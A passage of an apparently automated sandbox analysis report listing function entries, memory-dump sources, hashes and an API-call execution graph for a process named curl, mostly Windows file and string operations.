                                                                                                                                                                    • SearchPathA.KERNEL32(00000000,curl-ca-bundle.crt,00000000,00000105,00000000,?), ref: 001CD529
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeapPathSearch
                                                                                                                                                                    • String ID: curl-ca-bundle.crt$t1
                                                                                                                                                                    • API String ID: 982834405-666658975
                                                                                                                                                                    • Opcode ID: 855747cea8679934f8ca0a4916a7199387128492f1d3a8f607706514018db02d
                                                                                                                                                                    • Instruction ID: 3ddee0bfb7160441eb903079fccec95efe39ed0451e8fb1e3e157f8d8e789194
                                                                                                                                                                    • Opcode Fuzzy Hash: 855747cea8679934f8ca0a4916a7199387128492f1d3a8f607706514018db02d
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A01F5B27016012BE7149F29BC46FD77798DB91750F08003AFE09CA281EBA0D9118AA2
                                                                                                                                                                    Function 002C5E6A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002C5E07,002C260F,00307AE0,00000014), ref: 002C8FAA
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(w6,?,?,002C5E07,002C260F,00307AE0,00000014), ref: 002C8FD3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalDeleteSection
                                                                                                                                                                    • String ID: w6
                                                                                                                                                                    • API String ID: 166494926-1274408500
                                                                                                                                                                    • Opcode ID: 35649fd4f3050c7dae1fa078318d91934c3a92070e6da1771c46f96a1ba6c90c
                                                                                                                                                                    • Instruction ID: 10526da7564f22591e1f715a90c350ba097ada442579a1c4bd0aeb5a13d50c51
                                                                                                                                                                    • Opcode Fuzzy Hash: 35649fd4f3050c7dae1fa078318d91934c3a92070e6da1771c46f96a1ba6c90c
                                                                                                                                                                    • Instruction Fuzzy Hash: A1F0A4325266129BC7355E19EC88B16B75A9B40333F65932FE166825A2CB348CA5CA50
                                                                                                                                                                    Function 002CD537 Relevance: 5.1, APIs: 4, Instructions: 129COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002CD5CC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 002CD5DA
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000000,00000000,?), ref: 002CD62D
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002CD668
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                    • Opcode ID: bb8332b3825ecdf79fbece3fccfcc2421c16ffcb60cbe765e78424f31ac0b5f1
                                                                                                                                                                    • Instruction ID: 9b2a193ae72260da3f37a092b93bebb1b15da1781bd6281935d778cceaa5f880
                                                                                                                                                                    • Opcode Fuzzy Hash: bb8332b3825ecdf79fbece3fccfcc2421c16ffcb60cbe765e78424f31ac0b5f1
                                                                                                                                                                    • Instruction Fuzzy Hash: C841D370A20246AFCB219F28EC44FAB7BACEF45354F21427DF85997191DB309D20CB61

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:4.6%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:0.4%
                                                                                                                                                                    Total number of Nodes:1691
                                                                                                                                                                    Total number of Limit Nodes:44
                                                                                                                                                                    execution_graph 37466 43d440 6 API calls 37518 425d41 9 API calls 36146 430d46 36147 430d27 36146->36147 36147->36146 36149 430db8 36147->36149 36169 40f858 36147->36169 36150 430df9 36149->36150 36151 430dce 36149->36151 36152 430de7 36150->36152 36153 430e22 36150->36153 36154 430e0f 36150->36154 36151->36152 36157 40efd8 3 API calls 36151->36157 36155 430e2b 36153->36155 36156 430e3e 36153->36156 36158 40efd8 3 API calls 36154->36158 36159 40efd8 3 API calls 36155->36159 36161 40efd8 3 API calls 36156->36161 36160 430de1 36157->36160 36162 430e19 36158->36162 36164 430e35 36159->36164 36165 42bb7c 82 API calls 36160->36165 36166 430e4e 36161->36166 36163 42bb7c 82 API calls 36162->36163 36163->36152 36167 42bb7c 82 API calls 36164->36167 36165->36152 36168 42bb7c 82 API calls 36166->36168 36167->36152 36168->36152 36170 40f874 36169->36170 36174 40f878 36170->36174 36175 40f8bc 36170->36175 36172 40f889 36173 40f892 FindClose 36172->36173 36172->36174 36173->36174 36174->36147 36176 40c794 GetVersionExA 36175->36176 36177 40f8d7 36176->36177 36178 40fab9 36177->36178 36179 40f8df 36177->36179 36184 40fac2 36178->36184 36219 40bb5c WideCharToMultiByte 36178->36219 36183 40f8ee 36179->36183 36213 40bb80 MultiByteToWideChar 36179->36213 36185 40f954 FindNextFileW 36183->36185 36186 40f915 FindFirstFileW 36183->36186 36187 40fb26 FindNextFileA 36184->36187 36188 40faec FindFirstFileA 36184->36188 36192 40f965 GetLastError 36185->36192 36194 40f939 36185->36194 36191 40f92f GetLastError 36186->36191 36186->36194 36190 40fb37 GetLastError 36187->36190 36195 40fb4e 36187->36195 36189 40fb06 GetLastError 36188->36189 36188->36195 36193 40fb10 36189->36193 36190->36195 36191->36194 36192->36194 36193->36195 36212 40fa87 36194->36212 36214 40bb5c WideCharToMultiByte 36194->36214 36195->36212 36220 40bb80 MultiByteToWideChar 36195->36220 36198 40fb90 36221 4155a4 FileTimeToLocalFileTime FileTimeToSystemTime SystemTimeToFileTime 36198->36221 36199 40f9be 36215 40bb5c WideCharToMultiByte 36199->36215 36201 40fa0c 36216 4155a4 FileTimeToLocalFileTime FileTimeToSystemTime SystemTimeToFileTime 36201->36216 36204 40fc37 36222 4155a4 FileTimeToLocalFileTime FileTimeToSystemTime SystemTimeToFileTime 36204->36222 36205 40fa65 36217 4155a4 FileTimeToLocalFileTime FileTimeToSystemTime SystemTimeToFileTime 36205->36217 36208 40fc48 36223 4155a4 FileTimeToLocalFileTime FileTimeToSystemTime SystemTimeToFileTime 36208->36223 36209 40fa76 36218 4155a4 FileTimeToLocalFileTime FileTimeToSystemTime SystemTimeToFileTime 36209->36218 36212->36172 36213->36183 36214->36199 36215->36201 36216->36205 36217->36209 36218->36212 36219->36184 36220->36198 36221->36204 36222->36208 36223->36212 37520 433d44 84 API calls 37521 43df44 GetLastError DeleteFileW 37468 425e4a CompareStringA 37523 43b949 VirtualAlloc VirtualAlloc VirtualFree VirtualFree GlobalMemoryStatus 37470 42ce49 GetCurrentProcess SetPriorityClass GetCurrentThread SetThreadPriority LCMapStringA 37471 404e4c 6 API calls 37525 40bb50 GetCPInfo IsDBCSLeadByte 37472 43ac50 GetModuleHandleA GetProcAddress GetProcAddress GetProcAddress 37530 40c958 24 API calls 37532 424958 144 API calls 37476 431268 140 API calls 36283 441568 36284 43acd0 6 API calls 36283->36284 36285 441573 36284->36285 36286 441580 36285->36286 36287 44158b GetModuleFileNameA 36285->36287 36290 440bb4 16 API calls 36286->36290 36289 44158a 36289->36287 36290->36289 37537 429029 87 API calls 37538 441974 SetConsoleCtrlHandler 37478 442277 21 API calls 36567 432277 143 API calls 37542 422f77 202 API calls 37543 40f177 CompareStringA CharUpperA CharUpperA 37544 40c978 18 API calls 37479 401079 GetProcessHeap HeapAlloc TlsSetValue 37480 42d078 92 API calls 37546 40317f FreeLibrary VirtualFree VirtualFree 35367 431f03 35368 431f07 35367->35368 35369 40efd8 3 API calls 35368->35369 35375 431f92 35368->35375 35370 431f4f 35369->35370 35646 42bafc 82 API calls 35370->35646 35372 431f59 35373 40efd8 3 API calls 35372->35373 35374 431f88 35373->35374 35647 42bafc 82 API calls 35374->35647 35377 4323fb 35375->35377 35379 431fd5 35375->35379 35390 43227c 35375->35390 35378 432492 35377->35378 35537 432a2b 35377->35537 35673 403cbc 35377->35673 35381 4324c9 35378->35381 35383 4324b2 35378->35383 35393 4324ce 35378->35393 35382 431ff8 35379->35382 35392 432011 35379->35392 35395 432559 35381->35395 35608 42bb7c 35381->35608 35648 4031f0 82 API calls 35382->35648 35385 40efd8 3 API calls 35383->35385 35391 4324c3 35385->35391 35388 43200b 35389 43245d 35389->35378 35402 40efd8 3 API calls 35389->35402 35390->35377 35582 404e98 35390->35582 35396 42bb7c 82 API calls 35391->35396 35397 432017 35392->35397 35398 43204a 35392->35398 35394 4324ed 35393->35394 35403 432510 35393->35403 35404 4324e8 35393->35404 35394->35381 35399 40efd8 3 API calls 35394->35399 35614 42b678 35395->35614 35396->35381 35406 40efd8 3 API calls 35397->35406 35400 4320a4 35398->35400 35401 432059 35398->35401 35409 43253d 35399->35409 35538 403ef8 35400->35538 35411 40efd8 3 API calls 35401->35411 35407 432472 35402->35407 35413 40efd8 3 API calls 35403->35413 35404->35394 35410 4324f4 35404->35410 35414 432028 35406->35414 35677 42bafc 82 API calls 35407->35677 35416 42bb7c 82 API calls 35409->35416 35421 40efd8 3 API calls 35410->35421 35418 43206a 35411->35418 35422 432521 35413->35422 35415 42bb7c 82 API calls 35414->35415 35423 43202e 35415->35423 35416->35381 35426 42bb7c 82 API calls 35418->35426 35427 432505 35421->35427 35428 42bb7c 82 API calls 35422->35428 35649 4031f0 82 API calls 35423->35649 35424 43247c 35678 433a20 82 API calls 35424->35678 35425 432148 35430 432187 35425->35430 35431 43214c 35425->35431 35432 432070 35426->35432 35435 42bb7c 82 API calls 35427->35435 35428->35381 35440 4321aa 35430->35440 35441 43218d 35430->35441 35437 40efd8 3 API calls 35431->35437 35439 40efd8 3 API calls 35432->35439 35435->35381 35442 43215d 35437->35442 35438 4320d2 35446 432120 35438->35446 35651 4046f4 35438->35651 35443 43207d 35439->35443 35445 40efd8 3 API calls 35440->35445 35656 404720 35441->35656 35448 42bb7c 82 API calls 35442->35448 35450 42bb7c 82 API calls 35443->35450 35447 4321bb 35445->35447 35553 403f58 35446->35553 35662 42bafc 82 API calls 35447->35662 35454 432163 35448->35454 35455 432088 35450->35455 35453 432339 35453->35377 35468 40efd8 3 API calls 35453->35468 35459 40efd8 3 API calls 35454->35459 35650 4031f0 82 API calls 35455->35650 35457 403ef8 6 API calls 35457->35425 35458 4321c5 35663 433e00 82 API calls 35458->35663 35464 432170 35459->35464 35460 4325e5 35462 4326a0 35460->35462 35470 432675 35460->35470 35679 403c78 35460->35679 35461 43225e 35668 4031f0 82 API calls 35461->35668 35482 4326ea 35462->35482 35688 426c18 85 API calls 35462->35688 35469 42bb7c 82 API calls 35464->35469 35467 43217b 35467->35461 35484 432215 35467->35484 35664 40c794 35467->35664 35473 432365 35468->35473 35469->35467 35470->35462 35620 403ad0 35470->35620 35471 4320e9 35471->35446 35477 404e98 87 API calls 35471->35477 35670 42bafc 82 API calls 35473->35670 35477->35446 35480 432739 35485 432812 35480->35485 35701 40a3f0 35480->35701 35481 432205 35667 404b5c CreateFileW DeviceIoControl CloseHandle MultiByteToWideChar 35481->35667 35482->35480 35486 432776 35482->35486 35487 43275d 35482->35487 35562 404128 35484->35562 35490 432902 35485->35490 35491 432820 35485->35491 35494 4327b0 35486->35494 35495 4327dd 35486->35495 35689 432a90 139 API calls 35487->35689 35497 42bb7c 82 API calls 35490->35497 35498 432851 35491->35498 35500 43289d 35491->35500 35492 43236f 35499 403f58 82 API calls 35492->35499 35690 437b2c 35494->35690 35495->35480 35496 437b2c 139 API calls 35495->35496 35496->35480 35524 432898 35497->35524 35498->35524 35627 40efd8 35498->35627 35501 4323a4 35499->35501 35502 4328cb 35500->35502 35503 4328ac 35500->35503 35505 404e98 87 API calls 35501->35505 35507 40efd8 3 API calls 35502->35507 35506 40efd8 3 API calls 35503->35506 35508 4323d5 35505->35508 35510 4328bd 35506->35510 35511 4328dc 35507->35511 35512 432404 35508->35512 35513 4323d9 35508->35513 35704 42bafc 82 API calls 35510->35704 35705 42bafc 82 API calls 35511->35705 35512->35377 35672 433b7c 84 API calls 35512->35672 35517 40efd8 3 API calls 35513->35517 35519 4323f1 35517->35519 35671 42bafc 82 API calls 35519->35671 35521 42bb7c 82 API calls 35521->35524 35522 4328c6 35706 42bbec SetFilePointer WriteFile GetLastError 35522->35706 35526 432976 35524->35526 35524->35537 35707 403b38 SetEndOfFile 35524->35707 35634 403c50 35526->35634 35531 40c794 GetVersionExA 35532 4329dd 35531->35532 35533 4329f4 35532->35533 35534 4329e1 35532->35534 35643 403c60 35533->35643 35708 404b5c CreateFileW DeviceIoControl CloseHandle MultiByteToWideChar 35534->35708 35709 4031f0 82 API calls 35537->35709 35539 40c794 GetVersionExA 35538->35539 35540 403f06 35539->35540 35541 403f1e CreateDirectoryA 35540->35541 35543 403f14 CreateDirectoryW 35540->35543 35542 403f26 35541->35542 35544 403f39 GetLastError 35542->35544 35545 403f2a 35542->35545 35543->35542 35546 403f35 35544->35546 35547 404720 3 API calls 35545->35547 35546->35425 35548 404404 35546->35548 35547->35546 35549 40c794 GetVersionExA 35548->35549 35550 40440f 35549->35550 35551 40442f GetFileAttributesA 35550->35551 35552 40441d GetFileAttributesW 35550->35552 35551->35438 35552->35438 35561 403f78 35553->35561 35554 404116 35554->35457 35555 4040ee 35555->35554 35557 403ef8 6 API calls 35555->35557 35557->35554 35558 403ef8 6 API calls 35558->35561 35559 40efd8 LoadStringA LoadStringA WideCharToMultiByte 35559->35561 35560 42bb7c 82 API calls 35560->35561 35561->35555 35561->35558 35561->35559 35561->35560 35710 40bb5c WideCharToMultiByte 35561->35710 35563 40c794 GetVersionExA 35562->35563 35565 404141 35563->35565 35564 404296 35564->35461 35565->35564 35566 4046f4 3 API calls 35565->35566 35568 4041b9 35566->35568 35567 4041e6 35711 402fe8 35567->35711 35568->35567 35569 404720 3 API calls 35568->35569 35569->35567 35571 4041f6 CreateFileW 35571->35564 35572 40421b 35571->35572 35573 40422c 35572->35573 35715 41564c SystemTimeToFileTime LocalFileTimeToFileTime 35572->35715 35575 40423d 35573->35575 35716 41564c SystemTimeToFileTime LocalFileTimeToFileTime 35573->35716 35578 40424e SetFileTime CloseHandle 35575->35578 35717 41564c SystemTimeToFileTime LocalFileTimeToFileTime 35575->35717 35578->35564 35580 40428a 35578->35580 35581 404720 3 API calls 35580->35581 35581->35564 35604 404eb8 35582->35604 35583 404404 3 API calls 35583->35604 35584 404f6a 35585 4050cd 35584->35585 35719 4033b0 35584->35719 35601 404ee8 35585->35601 35728 4046ec 35585->35728 35586 404ecd 35586->35604 35731 4051a8 86 API calls 35586->35731 35591 403f58 82 API calls 35592 4050eb 35591->35592 35593 4050f1 35592->35593 35594 405102 35592->35594 35596 4033b0 4 API calls 35593->35596 35749 404ae4 DeleteFileW DeleteFileA GetVersionExA 35594->35749 35596->35601 35599 40efd8 LoadStringA LoadStringA WideCharToMultiByte 35599->35604 35601->35377 35669 433b7c 84 API calls 35601->35669 35603 42bb7c 82 API calls 35603->35604 35604->35583 35604->35584 35604->35586 35604->35599 35604->35601 35604->35603 35732 42bbb8 82 API calls 35604->35732 35733 42be18 82 API calls 35604->35733 35734 403838 35604->35734 35746 4031f0 82 API calls 35604->35746 35747 433c90 82 API calls 35604->35747 35748 405114 GetFileAttributesW GetFileAttributesA GetVersionExA WideCharToMultiByte 35604->35748 35609 42bbb5 35608->35609 35610 42bb88 35608->35610 35609->35395 35610->35609 35787 43d418 35610->35787 35615 42b68a 35614->35615 35616 42b6ac 35614->35616 35834 40cd40 MultiByteToWideChar CharToOemBuffA 35615->35834 35835 40cd40 MultiByteToWideChar CharToOemBuffA 35616->35835 35618 42b6aa 35618->35460 35621 4039e8 82 API calls 35620->35621 35622 403ae5 35621->35622 35623 403afd 35622->35623 35836 403b38 SetEndOfFile 35622->35836 35623->35462 35625 403af0 35626 4039b0 82 API calls 35625->35626 35626->35623 35628 40efec 35627->35628 35629 40f014 LoadStringA 35628->35629 35630 40f02a LoadStringA 35628->35630 35629->35630 35631 40f03c 35629->35631 35630->35631 35837 42ea6c 35631->35837 35633 40f04e 35633->35521 35842 403b50 35634->35842 35636 403c5b 35637 403514 35636->35637 35638 403526 35637->35638 35639 40352d 35637->35639 35638->35531 35638->35533 35639->35638 35640 403539 CloseHandle 35639->35640 35641 40354d 35639->35641 35640->35641 35641->35638 35854 433980 82 API calls 35641->35854 35644 404720 3 API calls 35643->35644 35645 403c74 35644->35645 35645->35537 35646->35372 35647->35375 35648->35388 35649->35388 35650->35388 35652 40c794 GetVersionExA 35651->35652 35653 4046ff 35652->35653 35654 404716 GetFileAttributesA 35653->35654 35655 40470d GetFileAttributesW 35653->35655 35654->35471 35655->35471 35657 40c794 GetVersionExA 35656->35657 35658 40472e 35657->35658 35659 40474d SetFileAttributesA 35658->35659 35661 40473c SetFileAttributesW 35658->35661 35660 40475c 35659->35660 35660->35467 35661->35660 35662->35458 35663->35467 35665 40c7d4 35664->35665 35666 40c7a6 GetVersionExA 35664->35666 35665->35481 35665->35484 35666->35665 35667->35484 35668->35388 35669->35453 35670->35492 35671->35377 35672->35377 35674 403cc2 35673->35674 35675 403cc5 GetFileType 35673->35675 35674->35389 35676 403cd2 35675->35676 35676->35389 35677->35424 35678->35378 35855 403104 35679->35855 35682 4039b0 82 API calls 35683 403c9b 35682->35683 35684 403a68 82 API calls 35683->35684 35685 403ca2 35684->35685 35858 403128 82 API calls 35685->35858 35687 403cb1 35687->35470 35688->35482 35689->35480 35691 437b34 35690->35691 35692 437b7e 35690->35692 35691->35692 35693 437b77 35691->35693 35694 437b67 35691->35694 35695 437b6f 35691->35695 35692->35480 35859 437d50 35693->35859 35879 4360c4 139 API calls 35694->35879 35880 436ed0 139 API calls 35695->35880 35699 437b6e 35699->35480 35700 437b76 35700->35480 35702 4039b0 82 API calls 35701->35702 35703 40a403 35702->35703 35703->35485 35704->35522 35705->35522 35706->35524 35707->35526 35708->35533 35709->35388 35710->35561 35712 402fef 35711->35712 35713 402ff5 35712->35713 35718 40bb80 MultiByteToWideChar 35712->35718 35713->35571 35715->35573 35716->35575 35717->35578 35718->35713 35720 4033c8 35719->35720 35721 40c794 GetVersionExA 35720->35721 35722 4033d7 35721->35722 35723 403400 CreateFileA 35722->35723 35724 4033e5 CreateFileW 35722->35724 35725 403419 35723->35725 35724->35725 35727 403446 35725->35727 35750 40bb5c WideCharToMultiByte 35725->35750 35727->35585 35729 404720 3 API calls 35728->35729 35730 4046f3 35729->35730 35730->35591 35731->35586 35732->35604 35733->35604 35735 403861 35734->35735 35739 403868 35734->35739 35763 403a68 SetFilePointer 35735->35763 35738 4038fe OemToCharA 35738->35604 35739->35738 35740 403918 35739->35740 35745 4038a1 35739->35745 35751 40392c 35739->35751 35773 4339d8 82 API calls 35739->35773 35774 4339bc 82 API calls 35740->35774 35744 40392c 4 API calls 35744->35745 35745->35738 35745->35744 35768 4039b0 35745->35768 35746->35604 35747->35604 35748->35604 35749->35601 35750->35727 35752 403956 ReadFile 35751->35752 35753 40393f GetStdHandle 35751->35753 35755 40396a 35752->35755 35760 40398b 35752->35760 35753->35752 35756 403cbc GetFileType 35755->35756 35757 403971 35756->35757 35758 40398d 35757->35758 35759 40397d 35757->35759 35758->35760 35761 403993 GetLastError 35758->35761 35762 40392c GetFileType 35759->35762 35760->35739 35761->35760 35762->35760 35764 403a8c GetLastError 35763->35764 35765 403aa8 35763->35765 35764->35765 35766 403a95 35764->35766 35765->35739 35766->35765 35775 433ab4 82 API calls 35766->35775 35776 4039e8 35768->35776 35771 4039df 35771->35745 35773->35739 35774->35738 35775->35765 35777 4039c8 35776->35777 35779 4039fc 35776->35779 35777->35771 35786 433ab4 82 API calls 35777->35786 35778 403a31 SetFilePointer 35778->35777 35780 403a52 GetLastError 35778->35780 35779->35778 35781 403a13 35779->35781 35782 403a1c 35779->35782 35780->35777 35783 403a68 80 API calls 35781->35783 35784 403c78 80 API calls 35782->35784 35785 403a1a 35783->35785 35784->35785 35785->35778 35786->35771 35801 43d60c 35787->35801 35789 42bba2 35790 42b92d 35789->35790 35791 42b94e 35790->35791 35792 42b958 35791->35792 35793 42b95a 35791->35793 35828 4031f0 82 API calls 35792->35828 35794 42b990 CharToOemA 35793->35794 35797 42b9a1 35794->35797 35796 42b98e 35796->35609 35806 403674 35797->35806 35803 43d647 35801->35803 35802 43df00 35802->35789 35803->35802 35805 43e41c WideCharToMultiByte 35803->35805 35805->35803 35807 40368c 35806->35807 35813 40382c 35806->35813 35808 40369b 35807->35808 35809 403698 35807->35809 35810 40369d GetStdHandle 35807->35810 35811 40370f WriteFile 35808->35811 35808->35813 35814 4036e5 WriteFile 35808->35814 35815 40374a GetLastError 35808->35815 35809->35808 35812 4036a9 GetStdHandle 35809->35812 35810->35808 35811->35808 35812->35808 35829 4031f0 82 API calls 35813->35829 35814->35808 35816 403a68 76 API calls 35815->35816 35817 403758 35816->35817 35830 4042e8 GetModuleHandleA GetProcAddress GetDiskFreeSpaceA LCMapStringA WideCharToMultiByte 35817->35830 35819 403766 SetLastError 35826 40377a 35819->35826 35821 403816 35833 433a20 82 API calls 35821->35833 35824 403825 35824->35813 35825 403a68 76 API calls 35825->35826 35826->35808 35826->35821 35826->35825 35827 4039b0 76 API calls 35826->35827 35831 433a38 82 API calls 35826->35831 35832 433a6c 82 API calls 35826->35832 35827->35826 35828->35796 35829->35796 35830->35819 35831->35826 35832->35826 35833->35824 35834->35618 35835->35618 35836->35625 35838 42ea85 35837->35838 35840 42eb00 35837->35840 35841 43d3f0 WideCharToMultiByte 35838->35841 35840->35633 35841->35840 35843 403b65 35842->35843 35844 403bc7 35843->35844 35851 41564c SystemTimeToFileTime LocalFileTimeToFileTime 35843->35851 35846 403bd7 35844->35846 35852 41564c SystemTimeToFileTime LocalFileTimeToFileTime 35844->35852 35849 403be7 SetFileTime 35846->35849 35853 41564c SystemTimeToFileTime LocalFileTimeToFileTime 35846->35853 35849->35636 35851->35844 35852->35846 35853->35849 35854->35638 35856 403a68 82 API calls 35855->35856 35857 403113 35856->35857 35857->35682 35858->35687 35860 437d65 35859->35860 35878 437de9 35860->35878 35893 43966c 35860->35893 35862 438df8 139 API calls 35862->35878 35863 437dc4 35897 438df8 35863->35897 35865 437e9d 35868 438e78 86 API calls 35865->35868 35867 437dcb 35869 437e59 35867->35869 35867->35878 35902 4393a4 139 API calls 35867->35902 35868->35869 35869->35692 35870 437e95 35916 4357c4 86 API calls 35870->35916 35877 4358f0 139 API calls 35877->35878 35878->35862 35878->35865 35878->35869 35878->35870 35878->35877 35881 43854c 35878->35881 35903 438e78 35878->35903 35917 4393a4 139 API calls 35878->35917 35918 43871c 